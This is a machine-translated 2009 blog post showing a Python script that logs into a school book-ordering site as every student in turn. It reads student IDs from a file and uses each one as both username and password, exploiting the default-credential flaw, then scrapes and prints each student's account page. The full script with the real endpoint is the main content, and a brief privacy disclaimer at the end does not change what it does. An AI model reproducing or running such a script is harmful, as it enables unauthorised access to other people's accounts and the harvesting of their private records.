Journal

Web Scraping with Python for Login-Protected Websites

2009·06·26

Machine-translated from Chinese.  ·  Read original

Last Time’s Introduction

Last time, I introduced using PHP combined with the curl library to crawl scores. Actually, Python scripts can also complete similar tasks, and they do it very nicely. I’m becoming more and more fond of Python, haha. This time, my target is the school’s book ordering website. This system has a huge loophole - all users’ default usernames and passwords are the same. So, I used it to practice information crawling. First, I’ll post the code, and here is the Python code:

import urllib, urllib2, cookielib
import re
f = open("dictionary address", "r")
username = f.readline().rstrip()
txt_last = ""
while username != '':
    a = cookielib.CookieJar()
    b = urllib2.build_opener(urllib2.HTTPCookieProcessor(a))
    urllib2.install_opener(b)
    dust1 = 'http://211.82.90.56:8080/caubook/TeacherLog.aspx?' + \
            '__VIEWSTATE=%2FwEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgICBw8PZBY' + \
            'CHgdvbmNsaWNrBSdpZih0aGlzLmRpc2FibGVkPT1mYWxzZSl7cmV' + \
            '0dXJuICBiYygpO31kZP%2B9YQS1SQoVhX0gctevArgHvY9U&Tbusername;='
    dust2 = username
    dust3 = '&Tbuserpwd;='
    dust4 = username
    dust5 = '&RadioButtonList1;=%E5%AD%A6%E7%94%9F&Button1;=%E7%A1%AE%E8%AE%A4&__EVENTVALIDATION' + \
            '=%2FwEWBwKZqo6EDgKS6L7%2FCwK1gprrAQLo4%' + \
            '2BrNDQLN7c0VAveMotMNAoznisYGXMvRojLDcm7L2wkg34m0QFH3k5c%3D'
    response = urllib2.urlopen(dust1 + dust2 + dust3 + dust4 + dust5)
    next = urllib2.urlopen('http://211.82.90.56:8080/caubook/Student/StuAna1.aspx')
    # print next.read()
    txt = next.read()
    if (txt != txt_last):
        txt_last = txt
        # txt = re.compile(r'< [^>]+>').sub('', txt)
        print txt
    username = f.readline().rstrip()

The third and fourth lines are used to open a file, which is used as a dictionary. Each line in the file is a student ID. This ID will be read into the program and used as both the username and password for submission (because the system defaults to the same username and password). Next, I’ll explain the key parts of the program. dust1-5 are used to concatenate the submitted URL string fragments. This can be obtained by analyzing the HTML POST section of the webpage and packet capture - that is, as long as you enter the URL composed of dust1+dust2+dust3+dust4+dust5 in the browser, you must be able to log in to the system normally. This book subscription system has a lot of messy code, and I don’t know ASP.NET, nor do I know why I need to submit these… We only need to focus on the parameters following &Tbusername;= and &Tbuserpwd;= - one is the username, and the other is the password, both of which are student IDs. We need to use

response = urllib2.urlopen(dust1 + dust2 + dust3 + dust4 + dust5)

to submit this URL. After submitting, a cookie will be returned. Previously, I didn’t know how to save this cookie. In Python, we only need to set

a = cookielib.CookieJar()

and then execute

b = urllib2.build_opener(urllib2.HTTPCookieProcessor(a))
urllib2.install_opener(b)

to let the program automatically save the cookie returned after submission. Through the above introduction, we have already implemented simulating browser submission and saving the returned cookie. Next, we only need to access the page we want to view under the condition of existing cookies (i.e., after logging in to the system). The following code is used for this purpose.

In summary, with a few simple lines of code, we can easily implement simulated login and cookie saving. We can use it to complete more tasks. My task this time is to crawl data, so I won’t discuss it further. You can research it yourself :)

P.S. When crawling data, please respect others’ privacy and do not damage others’ data. Those who violate this rule will be responsible for their own actions.

留 · 言